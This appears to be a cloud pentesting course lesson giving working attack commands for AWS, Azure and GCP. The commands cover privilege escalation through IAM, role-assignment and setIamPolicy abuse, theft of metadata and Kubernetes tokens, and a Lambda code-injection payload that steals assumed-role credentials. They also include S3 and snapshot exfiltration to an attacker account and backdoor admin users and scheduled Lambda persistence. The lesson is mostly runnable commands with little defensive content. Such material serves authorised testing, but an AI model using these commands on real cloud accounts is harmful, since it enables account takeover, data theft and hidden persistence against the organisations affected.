Cloud Pentesting & Assessment
Cloud Exploitation Techniques
4 min read
Understanding cloud-specific exploitation paths is essential for both offensive testing and defensive hardening. IAM policy abuse, privilege escalation, and lateral movement techniques differ significantly from traditional infrastructure attacks.
AWS Privilege Escalation
IAM-Based Escalation Paths
iam:PassRole + service creation:
# If you can pass roles and create Lambda
aws iam create-role --role-name EscalateRole --assume-role-policy-document file://trust.json
# Create Lambda with admin role
aws lambda create-function \
--function-name escalate \
--runtime python3.13 \
--role arn:aws:iam::123456789012:role/AdminRole \
--handler index.handler \
--zip-file fileb://payload.zip
# Lambda code retrieves admin credentials via metadata
iam:CreatePolicyVersion:
# Create new policy version with admin permissions
aws iam create-policy-version \
--policy-arn arn:aws:iam::123456789012:policy/TargetPolicy \
--policy-document file://admin-policy.json \
--set-as-default
iam:AttachUserPolicy / AttachRolePolicy:
# Attach AdministratorAccess
aws iam attach-user-policy \
--user-name compromised-user \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
Common Escalation Vectors
| Permission | Escalation Path |
|---|---|
iam:PassRole + lambda:CreateFunction | Create Lambda with privileged role |
iam:PassRole + ec2:RunInstances | Launch EC2 with instance profile |
iam:CreatePolicyVersion | Modify policy to add permissions |
iam:AttachUserPolicy | Attach admin policy |
iam:PutUserPolicy | Add inline admin policy |
sts:AssumeRole | Assume more privileged role |
lambda:UpdateFunctionCode | Modify existing Lambda |
ec2:ModifyInstanceAttribute | Change instance userData |
Automated Detection
# Pacu - AWS exploitation framework
python3 pacu.py
# Within Pacu:
> run iam__privesc_scan
> run iam__enum_permissions
Azure Privilege Escalation
Role Assignment Abuse
# If you have Owner or User Access Administrator
az role assignment create \
--assignee user@domain.com \
--role "Owner" \
--scope /subscriptions/SUBSCRIPTION_ID
Service Principal Exploitation
# Create service principal with privileged access
az ad sp create-for-rbac \
--name "attacker-sp" \
--role Contributor \
--scopes /subscriptions/SUBSCRIPTION_ID
# Use returned credentials
az login --service-principal \
-u APP_ID \
-p PASSWORD \
--tenant TENANT_ID
Managed Identity Abuse
# From compromised VM/App Service with managed identity
# Get access token
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# Use token for ARM API calls
curl -H "Authorization: Bearer $TOKEN" \
"https://management.azure.com/subscriptions?api-version=2020-01-01"
Azure AD Escalation
| Privilege | Escalation |
|---|---|
| Application.ReadWrite.All | Create app with privileged API permissions |
| RoleManagement.ReadWrite.Directory | Assign Global Admin |
| User.ReadWrite.All | Modify user attributes |
| Group.ReadWrite.All | Add self to privileged groups |
GCP Privilege Escalation
Service Account Key Creation
# If you have iam.serviceAccountKeys.create
gcloud iam service-accounts keys create key.json \
--iam-account admin-sa@project.iam.gserviceaccount.com
# Authenticate as service account
gcloud auth activate-service-account --key-file=key.json
setIamPolicy Abuse
# If you have setIamPolicy on project
gcloud projects set-iam-policy PROJECT_ID policy.json
# policy.json grants owner to attacker
{
"bindings": [{
"role": "roles/owner",
"members": ["user:attacker@gmail.com"]
}]
}
Impersonation
# If you can impersonate service accounts
gcloud auth print-access-token \
--impersonate-service-account=admin@project.iam.gserviceaccount.com
Lateral Movement
AWS Cross-Account Access
# Enumerate assumable roles
aws iam list-roles \
--query 'Roles[*].[RoleName,AssumeRolePolicyDocument]'
# Assume cross-account role
aws sts assume-role \
--role-arn arn:aws:iam::TARGET_ACCOUNT:role/TrustedRole \
--role-session-name lateral-movement
# Use new credentials
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
Lambda Function Code Injection
# Modify existing Lambda function
cat > payload.py << 'EOF'
import boto3
import os
def handler(event, context):
client = boto3.client('sts')
creds = client.assume_role(
RoleArn=os.environ['TARGET_ROLE'],
RoleSessionName='injected'
)
# Exfiltrate credentials
return creds['Credentials']
EOF
zip payload.zip payload.py
aws lambda update-function-code \
--function-name target-function \
--zip-file fileb://payload.zip
Kubernetes Service Account Token
# From compromised pod
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Use token to access API
kubectl --token=$TOKEN --server=https://kubernetes.default auth can-i --list
kubectl --token=$TOKEN get secrets -A
Data Exfiltration
S3 Bucket Exfiltration
# Copy entire bucket
aws s3 sync s3://target-bucket ./exfil/
# If bucket is public
aws s3 cp s3://target-bucket/sensitive.db ./exfil/ --no-sign-request
Database Snapshot Sharing
# Share RDS snapshot with attacker account
aws rds modify-db-snapshot-attribute \
--db-snapshot-identifier target-snapshot \
--attribute-name restore \
--values-to-add ATTACKER_ACCOUNT_ID
# In attacker account, restore snapshot
aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier stolen-db \
--db-snapshot-identifier arn:aws:rds:region:VICTIM:snapshot:target-snapshot
Persistence Techniques
IAM User/Access Key Creation
# Create backdoor user
aws iam create-user --user-name service-automation
# Create access keys
aws iam create-access-key --user-name service-automation
# Attach permissions
aws iam attach-user-policy \
--user-name service-automation \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
Lambda Backdoor
# Create persistent Lambda triggered by CloudWatch Events
aws events put-rule \
--name backdoor-trigger \
--schedule-expression "rate(1 day)"
aws lambda add-permission \
--function-name backdoor \
--statement-id events \
--action lambda:InvokeFunction \
--principal events.amazonaws.com
aws events put-targets \
--rule backdoor-trigger \
--targets "Id"="1","Arn"="arn:aws:lambda:region:account:function:backdoor"
Exploitation Checklist
| Phase | AWS | Azure | GCP |
|---|---|---|---|
| Priv Esc | PassRole, CreatePolicyVersion | Role assignments, Managed Identity | setIamPolicy, SA keys |
| Lateral | AssumeRole, Lambda injection | Service principals | Impersonation |
| Persist | IAM users, Lambda | App registration | SA keys |
| Exfil | S3 sync, snapshot share | Blob download | gsutil |
Next, we'll explore cloud security assessment tools and frameworks. :::